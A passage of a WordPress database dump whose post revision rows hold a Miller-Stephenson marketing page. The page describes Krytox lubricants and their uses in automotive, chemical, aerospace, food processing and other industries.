seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:34:11', '2016-09-28 19:34:11', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2121, 2, '2016-09-28 19:36:28', '2016-09-28 19:36:28', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:36:28', '2016-09-28 19:36:28', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
